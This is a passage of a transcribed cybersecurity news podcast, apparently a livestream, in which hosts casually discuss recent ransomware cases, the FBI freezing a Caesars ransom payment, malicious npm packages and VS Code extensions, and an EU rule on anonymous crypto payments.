Yeah, no, I, I remember and probably there's a lot of other people who remember this. Like you have any sort of like minor hiccup in a skiff like that. That is, that is a problem. Like I, I did a base visit for a week and I was told not to come there one day because they're like, you weren't in this area, were you? And I'm like, no. And I'm like, okay, somebody left the skiff door unlocked when they shut down at night. And it is like a big problem right now. But you go, it's like even with something like that oversight that they really clamped down on, it was like, well, first you have to get over the bridge to the base, get access to the base, get access to the building, get access to the room that goes before the skiff and then get, and then, sure, your skiff is unlocked. But it was like, heads are going to roll for this thing. And I'm seeing like more. And for proper reasons. Like they had a lot of emphasis on that, but I'm not seeing that here. And I hope there isn't any sort of like, you know, chilling effect on taking, you know, skif procedures seriously. If they, you know, if people are looking at, other than going, well, they did this and nothing came of it, what's the big deal for, you know, my, you know, minor transgressions on handling skiff protocols or, you know, access.
- [37:42]
Ralph May
It sounds like we're headed toward chicken, man.
- [37:50]
Ryan
Let's talk about ransomware. We haven't got that, that deep into it. It's kind of a good, it's kind of a good, it's kind of a good feeling.
- [37:57]
Ralph May
1.
- [37:57]
Ryan
All right. Like the FBI did some things.
- [37:59]
Ralph May
Oh, did they.
- [38:00]
Ryan
And interesting.
- [38:01]
Ralph May
All right, well, what'd they do?
- [38:03]
Ryan
All right, so this article, the Caesar entertainment hack, we all know about it, right? When they fell. What? I threw it in there.
- [38:10]
Ralph May
No, I mean, I didn't know they got hacked. There's no way.
- [38:12]
Ryan
Oh. Oh, okay. Anyway. Oh, it's a close one. BFF doesn't need any money from me, but. So when scatter spider got hit. Right. It goes over pretty much. How? Right off the bat, they actually asked for 30 million and Caesar gave 15 million. But the FBI was actually able to freeze it by talking to some of the wallet, some of the big whatever. Crypto holders as it was being moved around. Let me. Let me read my description. This is the only one I did read. The FBI acted swiftly to prevent the hackers from moving the ransom fund, successfully freezing this substantial amount when the criminals attempted to convert the crypto into other forms. So it did start as btc, Right? Which I found a little bit weird. I always think of different coins nowadays when any type of ransomware payments being made. But I guess BTC is probably the easiest one to get that much amount of that quickly. The FBI immediately hopped on it and got it all absolutely frozen. And showcasing their enhanced law enforcement capabilities.
- [39:29]
Ralph May
Enhanced law.
- [39:30]
Test Speaker
Enhance.
- [39:31]
Ralph May
Enhanced.
- [39:32]
Test Speaker
Enhance. Enhancing.
- [39:33]
Ryan
So just remember, bitcoin is not anonymous. There's plenty of cool tools out there that can actually track you and easily know where it's going.
- [39:40]
Ralph May
Like chainalysis. There's all kinds of opportunities to do there.
- [39:43]
Ryan
Once again, it's not 2013.
- [39:47]
Ralph May
Yeah, there's good mixers too. I mean, there's other.
- [39:49]
Ryan
But like you.
- [39:50]
Ralph May
Like you did say, though, it's kind of hard to get, you know, $30 million and you know, a Nana coin or whatever you want to call it, right?
- [39:58]
Test Speaker
Yeah.
- [39:58]
Ryan
Yeah, right. But hats off the Caesars too. It was a 30 million dollar ransom. They only had to pay 15. That's some good bargaining right there.
- [40:08]
Ralph May
Yeah.
- [40:09]
Unknown Speaker G
So, wait, I may have missed this, but was the FBI able to do this without having any sort of encryption backdoor that they need in order to solve crimes?
- [40:18]
Ryan
So what I read is they were able. So the court documents state that the control. They tracked the cryptocurrency to a place called Ava Labs Inc. And requested them to immediately freeze the bitcoin. It was 402.4 bitcoins in an avalanche wallet.
- [40:36]
Unknown Speaker G
Okay, well, maybe I was being a bit fastidious here because you see all these arguments that say we must have encryption backdoors because otherwise we won't be able to catch ripples like, we have to have encryption backdoors. They have to be there. You have to provide with some sort of backdoor so that we can do this. Otherwise, like, the criminals are just going to go nuts and we're not going to be able to do anything monetically. No, you can solve crimes without having encryption back doors. You can't stop cybercriminals without having encryption backdoors. Like, again, I think I said they just want the easy button. And here it is, like, you know, commendable. Absolutely commendable. Like web, like Wade said that they're able to find this type of information.
- [41:20]
Ryan
What's xmr? What coin is that?
- [41:23]
Ralph May
I want to say I got to.
- [41:25]
Ryan
Right click and Google. It's Moreno. Okay, that's what I thought. They were also able to track it in Gate O another website, and when it was in Moreno and had them actually freeze currency too. So they were on the ball. So whoever was at Caesars that had that plan going to alert FBI. Monero. Yeah.
- [41:45]
Ralph May
Yeah.
- [41:45]
Ryan
Once again, like, when this type of stuff happens, having knowing your local agent or having at least that plan in place to actually talk to law enforcement can really help you out. Or at least make it so the bad guys don't win just as much. Right?
- [41:59]
Test Speaker
It's a start. It's definitely a start. It's a good start. Hopefully we see more stories like this.
- [42:05]
Ralph May
Monero, Monero. Monero.
- [42:09]
Ryan
What else we got? Ransomware Gang uses chicken to encrypt. No, no, that's something else.
- [42:16]
Ralph May
Yeah, I mean, we got plenty of ransomware articles. I mean, it's like they're. I mean, this is like the normal SOP around the world. Right. So I think the other one that was kind of on the top here was that Sam's Club investigates the Clop ransomware breach claims.
- [42:36]
Ryan
So Sam Club, an American warehouse supermarket chain owned by US retailer Walmart is investigating claims they operate over 600 warehouses, United States and Puerto Rico.
- [42:47]
Ralph May
Yeah.
- [42:48]
Ryan
2.3 million employees. Bunch of money.
- [42:52]
Test Speaker
Oh, yeah.
- [42:52]
Ryan
Clop claims the breach after Ransomware Gang also started extorting dozens of victims. They used a zero day to get in.
- [43:00]
Ralph May
Oh, okay. So they're saying it was not a breach, but rather a case of them obtaining username and passwords from phishing campaigns.
- [43:10]
Unknown Speaker G
Okay.
- [43:11]
Ralph May
We reset the password for these accounts, taking additional. I mean, this is common for big organizations that have lots and lots of users of their platforms to get compromised in a bunch of different ways. Right.
- [43:25]
Ryan
This is why they got to have MFA turned on.
- [43:28]
Ralph May
Yeah.
- [43:29]
Ryan
Or they just Put a captcha, you know, that protects everybody.
- [43:32]
Test Speaker
Oh, captchas are extremely safe. Like God loves captcha.
- [43:36]
Unknown Speaker E
Yeah, yeah. Tell that to the domain I lost over the weekend.
- [43:40]
Ryan
You lost the domain over the weekend?
- [43:42]
Test Speaker
It was.
- [43:43]
Unknown Speaker E
Well, I made a website for a nonprofit and they've kind of stopped doing a whole lot of stuff. But the most traffic that domain has ever gotten is from hackers trying to brute force or otherwise attack the site. And while it was at Eastside San Diego, I got a notice from the host company saying, hey, your usage went off the charts. And I went in and the cool thing. And one of the reasons I use this host is because they've got good security. I've had them for years and they just keep expanding and doing it right. And they. They suspended the account. They locked it down. And, you know, it's like, yeah, just nuke it. I'll do a backup. I've got backups. Nuke it. Let's take it off the board. It's going to be transferred to someone else soon anyway, so. It's hard to stay ahead of this stuff because those blasted hackers are incessant. I finally had to turn off email notifications of every time they were trying to log in with a bogus user ID because I'd be getting 50 in five minutes.
- [44:55]
Ryan
We shouldn't have advertised Europe said San Diego as my fault. Teaching an excellent how to build a local LLM class that she will now be teaching here. Highly suggested.
- [45:07]
Unknown Speaker E
I do have the. The webcast on Thursday. That would have to be brought up at some point during the cast, but it was. It was very cool. It was. It was very nice. Been getting a lot of positive feedback. I gave the first one at scale and then I did the workshop at BSides and wonderful students, wonderful questions, great people, good times, good stuff.
- [45:31]
Unknown Speaker F
And you took a great photo of Kelly. I loved that picture.
- [45:37]
Unknown Speaker E
Kelly really rocked that keynote. That was really cool.
- [45:40]
Unknown Speaker F
I'm gonna go next year for sure.
- [45:42]
Ryan
Buy your tickets quick. Okay.
- [45:46]
Unknown Speaker G
This is.
- [45:47]
Ryan
Dude, I received so many asks for tickets. I've had bad people. That's. I. This is the worst part. I'm gonna say this out loud several of the times. I. If I got a ticket, I would immediately give it to the first person who asked me last because I didn't want to deal with it. And that worked out for like four people. And me saying that you're gonna be one of.
- [46:07]
Ralph May
Oh, my God. I can't believe that I asked you, man.
- [46:10]
Ryan
You should have asked. I know. I told you. You're gonna you could couch surf, you know.
- [46:13]
Unknown Speaker G
You didn't want to come up.
- [46:14]
Ralph May
Capstone.
- [46:16]
Unknown Speaker G
What is it?
- [46:16]
Ralph May
There's another article about the Van Helsing ransomware. Anyways, they're targeting Windows ARM and ESXi systems. I think there's like the bigger thing here. I know. This is not that crazy. Is that they're just going after more than just Windows systems. Right. Any systems they can possibly. I know. ESXi. Honestly, ESXi is going to die here soon because Broadcom's about to sell that one down the river. So no one's going to have ESXI anymore. But that. Anyhow, just targeting all the platforms they possibly can with. All of it.
- [46:49]
Unknown Speaker G
Yeah.
- [46:50]
Ryan
It's still a juicy target. Right. Because it's got all the keys to the kingdom.
- [46:54]
Unknown Speaker G
Right.
- [46:54]
Ryan
And there's been a couple recent vulnerabilities with it. It's going to take everyone forever to slowly migrate off of it.
- [47:02]
Ralph May
They got 80, 20 rule here. 80% of the ransom payments go to the operator or go to the person who did the compromise, and only 20% go to the operator readers.
- [47:13]
Ryan
I didn't know that that was. That's a good ratio.
- [47:16]
Ralph May
Yeah. And they use an escrow system.
- [47:18]
Unknown Speaker G
Yeah.
- [47:18]
Ralph May
So they never have access to. They, they. They're not. The, the person who's making the rent somewhere is not like, oh, we're taking all the money. Hopefully we pay.
- [47:27]
Ryan
Sometimes I rethink my career.
- [47:31]
Test Speaker
I don't. I don't like how Van Helsing is. Is targeted bsd. I just noticed. That makes me nervous.
- [47:39]
Ralph May
No, there's no way they're making ransomware for BSD systems.
- [47:45]
Test Speaker
I literally just saw it on articles.
- [47:48]
Ralph May
You'll never pay.
- [47:49]
Test Speaker
You see that there? Look at that. Oh, my goodness.
- [47:52]
Ralph May
You'll take. But you'll take that as an opportunity to just rebuild your system.
- [47:57]
Test Speaker
Pretty much. If somebody would give me an idea. Hey, come on over to Ark. We're waiting for you.
- [48:06]
Ralph May
Yes, yes. You can compile everything, the whole thing. It's the most artisanal. Oh, my God.
- [48:18]
Ryan
All right, here's an interesting one. As I'm reading news articles, trying to find cool stuff for us to talk about.
- [48:23]
Ralph May
Oh, look at you.
- [48:26]
Ryan
Look at me actually reading the news.
- [48:28]
Unknown Speaker E
Well, we do have kind of a pattern in the malware Finds a way. We've got two articles talking about NPM and then another one that I. Npm's.
- [48:39]
Ralph May
Really hot right now. It is so hot.
- [48:42]
Unknown Speaker E
And then on top of it, ransomware has also been found in VS code extensions. And so what I'm seeing in those Three articles in particular is this pattern of NPM is a library that is used to help supplement web developers and other kinds of developers. And the VS code extensions are similar. They're add ons to help people who are using VS code. And these sort of additional things are being targeted over and over again as a way into madness.
- [49:21]
Ryan
Yeah, I will admit as a blue teamer, the VS code extension stuff is a little scary just because oh you're.
- [49:27]
Ralph May
VS coding it.
- [49:31]
Ryan
Just vibing, you know, don't know a lot of security people who are like digesting enough logs to really look at those. That type of stuff and what they're installing and what they're going and also or at least protections to prevent people from randomly downloading.
- [49:46]
Ralph May
Yeah, there is an insane amount of extensions in the VS code library and they all do like there's like five extensions for like the same thing too.
- [49:55]
Ryan
Like not sure which one's the best.
- [49:58]
Ralph May
Yeah, yeah, it's like we're back in the day. We'd be like download this file and there's like 75 download buttons. They're all ads. The one that actually is to download the file. That's what it feels like with VS code extensions. Right?
- [50:11]
Test Speaker
That is true.
- [50:12]
Ralph May
All of them are malware except for one.
- [50:14]
Test Speaker
And hopefully you don't have the luck of the draw. I mean now you got me thinking about going back and checking out my rust analyzer.
- [50:20]
Ryan
Yeah, I one time I logged into a via like my VS code and I hadn't logged in for a while and a couple of the extensions were like removed and I was like oh, like why were those removed or turned off? And I'm like what? And so diving into it thinking like, did I get one? Did it hit me? But I try to use the leave.
- [50:40]
Ralph May
Amount of VS code or cursor extension, same thing.
- [50:43]
Ryan
Oh, cursor. Huh huh. Look who's vibe coding now.
- [50:46]
Unknown Speaker G
Oh, I'm pretty cool.
- [50:48]
Ralph May
I'm in. I'm in deep. I'm too deep. Are you?
- [50:51]
Ryan
Oh yeah, we don't have any, we don't have any vibe coding articles surprisingly.
- [50:55]
Ralph May
Yeah, so. And I hear it too all the time and I'm like, no, my coding's different. But anyways, yeah, so.
- [51:03]
Unknown Speaker E
So I'm an alien in that I'm still using stuff like Sublime Text and oh yeah, I, I avoid visual editors and tools like the plague because I still have PTSD from a gajillion years ago dealing with with all the bloat co generated by. I don't even remember the name.
- [51:23]
Test Speaker
It's okay. I guess we're aliens together. I still use Vim.
- [51:27]
Ralph May
Oh, wow.
- [51:28]
Unknown Speaker E
I'm not quite that much.
- [51:29]
Ralph May
I don't think you realize how much more productive you would be with just VS code. Which, by the way, there's nothing visual about VS code.
- [51:43]
Test Speaker
I put up the screen too, you know. You know, throw a little term in there to get the bottom screen.
- [51:48]
Ryan
I use rainbow tabs, you know, like it shows me make sure everything's tabbed the right way. That's. It's very. I'm very visual. I don't know if this is. I use Jupyter notebooks in visual code. In VS code. Like it's like a box inside of a box.
- [52:04]
Unknown Speaker E
Oh yeah, you can use notebook Jupyter notebooks inside VS code.
- [52:10]
Ryan
Yeah, yeah, it's a lot easier. So then I get all the extensions. Yeah, it's very good.
- [52:15]
Test Speaker
Damn, I feel like I'm sitting in a code confessionals meeting or something like that.
- [52:21]
Ralph May
So wait till you figure out how to use MCPS and then you'll know what's up.
- [52:28]
Unknown Speaker E
Well, I'm gearing up for my next AI course, so I'm looking for ways to avoid melting my brain quite as many times.
- [52:41]
Test Speaker
Yeah, it's just so much out there. It's just kind of like you're like, oh yeah.
- [52:48]
Unknown Speaker E
If it weren't for the fact that I already know SQL, I already know Python, I already know how to do a whole bunch of this stuff. And then there's the stuff that I don't know. I feel like if I didn't have the advantages of the things I do, I'd be lost.
- [53:05]
Ryan
Speaking of losing stuff, let's go back to the segue master here.
- [53:11]
Test Speaker
There you go.
- [53:12]
Ryan
The EU bans anonymous crypto payments. Oh, how are they gonna do that? Don't ask me, but I think there's making like.
- [53:20]
Ralph May
I feel like laws are just getting made up. They're like, you know what? We're just gonna make air. Ban. Ban it. You can't breathe air anymore, dude. Yeah, we'll see how that works.
- [53:32]
Ryan
We're all gonna drink. We're all gonna breathe water. Soon.
- [53:36]
Test Speaker
We'Re gonna grow gills.
- [53:38]
Ralph May
Do this.
- [53:38]
Test Speaker
Yeah, exactly.
- [53:39]
Ralph May
I mean, sir, you're funny.
- [53:43]
Ryan
So the legislation applies to payments made through online service providers, also known as hosted wallets. I probably should have read this one before I read the other ones. But it also applies to platforms that exchange regular fiat currency. If it does not apply to owners hardware self hosted wallets. So technically, if Bitcoin is anonymous, could we could you still use that. Right? This is when we. So we need to read these beforehand. But this is kind of interesting. I don't think it's going to. It's like one of those laws that's just put in place to be put in place. Don't know how you're going to really affect criminals or how you're going to stop people from still doing this. Yeah, there's a. There's a quote in here that generally prohibiting anomalous payments would at best have minimal effects on crime, but it would deprive innocent citizens of their financial freedoms. That's. That's pretty much where I'm.
- [54:34]
Ralph May
Yeah.
- [54:35]
Unknown Speaker G
I mean, it talks of anonymous donations and, you know.
- [54:39]
Ralph May
Yeah.
- [54:39]
Unknown Speaker G
When you're a dissident and you go, it's like, I need to raise money, and you go, oh, I want to give money for. To help this dissident. It's like. Yeah, you can't do it anonymously. It's like, oh, God.
- [54:49]
Ralph May
Yeah, you definitely. That's. That's really the bad stuff.
- [54:51]
Ryan
Right There Isn't cash anonymous? Well, if I wear a mask, I.
- [54:56]
Ralph May
Mean, cash is totally not anonymous. You know what I mean? Like, that's.
- [55:03]
Unknown Speaker G
Honestly.
- [55:04]
Ralph May
Drug dealers hate cash. They hate it. Hate it.
- [55:07]
Test Speaker
Well, what if you wear gloves?
- [55:10]
Unknown Speaker F
How do you know this?
- [55:11]
Unknown Speaker G
I was going to say I was the same question, but then I saw, like, his tag is Florida van, so I'm like, that.
- [55:17]
Test Speaker
Coding Confessionals, part two.
- [55:19]
Ryan
Yeah, the. The next sentence of that quote, I should have kept going, the medicines or sex toy. Sex toys I buy is nobody's business. That was.
- [55:31]
Ralph May
I mean, listen, the truth is, they're. Right. Right.
- [55:35]
Ryan
Yeah.
- [55:36]
Ralph May
You know, like, why is that the government's business? I mean, legitimately, if we want to talk about just, like, where the government's lane is, whichever government, it doesn't matter where you're at. It should.
- [55:47]
Unknown Speaker E
As a general category.
- [55:48]
Ryan
Yeah.
- [55:49]
Ralph May
As a general category, it shouldn't be, you know, about the prescription medications that I'm taking. Right. Or the, you know, the sex toys or whatever. Right. It's really just none of their business. All right.
- [56:02]
Ryan
I always wonder, is it chicken time? Oh, I can't. It's chicken time. All right, you can do the chicken article then.
- [56:08]
Ralph May
Oh, I didn't read it.
- [56:09]
Ryan
You didn't read it? It's. It's literally like one sentence.
- [56:14]
Unknown Speaker E
This is. This doesn't know where we're really winging it.
- [56:17]
Ralph May
All right, so it sounds like South Africa. Yes. In South Africa, they got cooked and royal even. Yeah. Essentially, there was a cyber Security incident, the company disaster recovery protocols. However, there was some downtime. This downtime is going to cost them a bunch of money to catch up in the backlog of chicken production. And supposedly they lost like a million dollars.
- [56:52]
Test Speaker
Wow.
- [56:53]
Ralph May
And they argued no confidential sensitive data. So essentially they got ransomware. Most likely. Yeah. I'm just not sure what. Mostly they're just saying we lost money because of production. And it doesn't say they paid anything.
- [57:08]
Test Speaker
This might be time to develop poultry protocols.
- [57:14]
Ryan
This article taught me that there's a breed of chicken called broiler chickens.
- [57:17]
Ralph May
I feel like that's different types of chickens.
- [57:20]
Unknown Speaker E
There are so many different kinds of.
- [57:22]
Ryan
Chickens, so that ones are meant to be chickens. Chicken levels.
- [57:26]
Ralph May
Chicken levels. There are different types of chicken, some of them for laying eggs, some of them for eating. They're not all. They don't all taste good. Not everything tastes like chicken.
- [57:40]
Test Speaker
So it's kind of like how data travels through a network card. So you got your encapsulation and a decapsulation type scenario there.
- [57:46]
Ralph May
No.
- [57:47]
Unknown Speaker F
Anyway, is this gonna affect the price of eggs at all?
- [57:50]
Ralph May
Oh, my God.
- [57:53]
Ryan
They're broiler chickens. This is going. This goes directly with. With the direct article that we read where the chip where there was like chicken wings versus eggs, and eggs were going up, but chicken wings were going down. Right? Yeah. Different types of chickens. So we're fine.
- [58:07]
Ralph May
Right?
- [58:07]
Ryan
I forgot. I read. I read that article about the National Chicken Institution or something like that. It was. I was pretty amazed.
- [58:14]
Test Speaker
So there's a wing division. All right.
- [58:19]
Ralph May
Oh, God. Well, all right, so chicken. Chicken article aside, Right. Funny, because it's chicken, but the. Any. Any vertical, right. Is susceptible, essentially. You know, every company's got it now, right? Which is why MSPS are so popular nowadays, because they don't deal with any of that. But they all have it. They all need email, they all need teams and zoom and meetings and all the other stuff. Even if it's meetings about chickens. I mean, I don't. But, you know, this is. This is all still going on. It's not like everybody's like, you know, we don't need a computer at our business. Nothing. We need no computers. It's also appropriate that it would be in another country which probably has, you know, less budget for security stuff.
- [59:04]
Unknown Speaker G
So.
- [59:04]
Test Speaker
Hey, so I learned something new today. So it's. There's levels of chickens just like there's flavors of Lennox. I mean, they go hand in hand, you know.
- [59:12]
Ralph May
All right, well, I think we broiled our last article.
- [59:16]
Ryan
We went through a lot today. We didn't. I'm happy for us. I feel like we're light hearted. Did all the articles.
- [59:22]
Ralph May
We did a lot of articles.
- [59:25]
Ryan
Maybe we were an intel feed bullets.
- [59:29]
Unknown Speaker E
I thought that was handled well.
- [59:30]
Ryan
So it was a light weeks. Especially because I was not reading any news articles for the past week. So that's you.
- [59:37]
Unknown Speaker G
You.
- [59:37]
Ralph May
You single handedly make all the articles? Is that what you're trying to say?
- [59:40]
Ryan
I'll blame myself. Me and a couple different chat GBT bots, you know, just pump them.
- [59:44]
Ralph May
Oh my gosh. Out. Yeah.
- [59:47]
Ryan
You guys didn't know this, but I'm really a billionaire news article writer in the background.
- [59:51]
Ralph May
How do you get paid for this awesome.
- [59:53]
Test Speaker
Way awesome Ghost Riders, you know?
- [59:57]
Ryan
Do you remember, do you remember it? At Way West Hack and Fest we read an article that was like clearly AI written. It was like, oh yeah.
- [60:07]
Ralph May
We were just dying laughing and we were roasting it.
- [60:10]
Ryan
After that moment I realized I could be an AI writer too.
- [60:12]
Ralph May
Yes. You know what the funny part is that when we were reading it we realized that we had got gotten too. We're like spreading this like worthless article as a group and then realizing we did it. We had, you know.
- [60:27]
Unknown Speaker E
You realized it.
- [60:29]
Ralph May
Yeah.
- [60:30]
Unknown Speaker E
How many people don't.
- [60:32]
Ralph May
Oh my God. Yeah. Well, there's just so many articles too. And like in some of these, even from the places that we do find a good article, there'd be like 10 kind of like fluff articles and then like one real article that actually happened that week. Like one like real story, you know?
- [60:45]
Unknown Speaker E
Yeah.
- [60:46]
Unknown Speaker G
So yeah, most info psych articles like you have to skip to like the second to last paragraph to get like the real key items. Like I started doing that. Like scroll down to the bottom, go up one paragraph, go up one paragraph more and you go, oh, there's the.
- [61:00]
Test Speaker
Whole meat potatoes right there.
- [61:01]
Unknown Speaker G
That's the whole like meat of the thing. Because usually like the last paragraph is like we reached out to the company and they didn't have any comment. And that's like the last. But like above it is the whole like key item going on there.
- [61:13]
Ralph May
I've been working on.
- [61:17]
Test Speaker
Pop up.
- [61:20]
Unknown Speaker F
And that last article kind of just made me think about all of the small, small, small shops that don't have an msp. They just, they're so small, you know, hats off to them. I mean there's just so much to be vigilant about now when you just have a skeleton crew like that.
- [61:34]
Ralph May
Oh yeah, business email compromise. They're looking for you too. They're dying to make that next little one. So anyways, I just.
- [61:41]
Ryan
I just totally realized I could export this entire our note section and just upload it to chat GPT and have it.
- [61:47]
Ralph May
Yeah and then just have it summarize it for you. Oh my God. Here's what I've been doing. I have an agent that's scouring for articles for me and just lets me know when there's good ones.
- [61:55]
Ryan
God damn you and agents. I. I don't. I'm not that crazy. I'm not installing one of those on here.
- [62:01]
Ralph May
What? I didn't install it on anything. It just works. Don't you loud agentic AI Yes. It's all the range. It's. It's everywhere. It's in your computer.
- [62:12]
Unknown Speaker E
Somebody else's hardware.
- [62:13]
Ralph May
Yeah.
- [62:14]
Ryan
I'm going to take my Windows 11 and go offline. All right.
- [62:19]
Unknown Speaker F
Good luck with that.
- [62:21]
Ralph May
Speaking of going offline. All right, everybody, thank you for joining us and we will see you guys next time. Bye.
- [62:28]
Test Speaker
Later.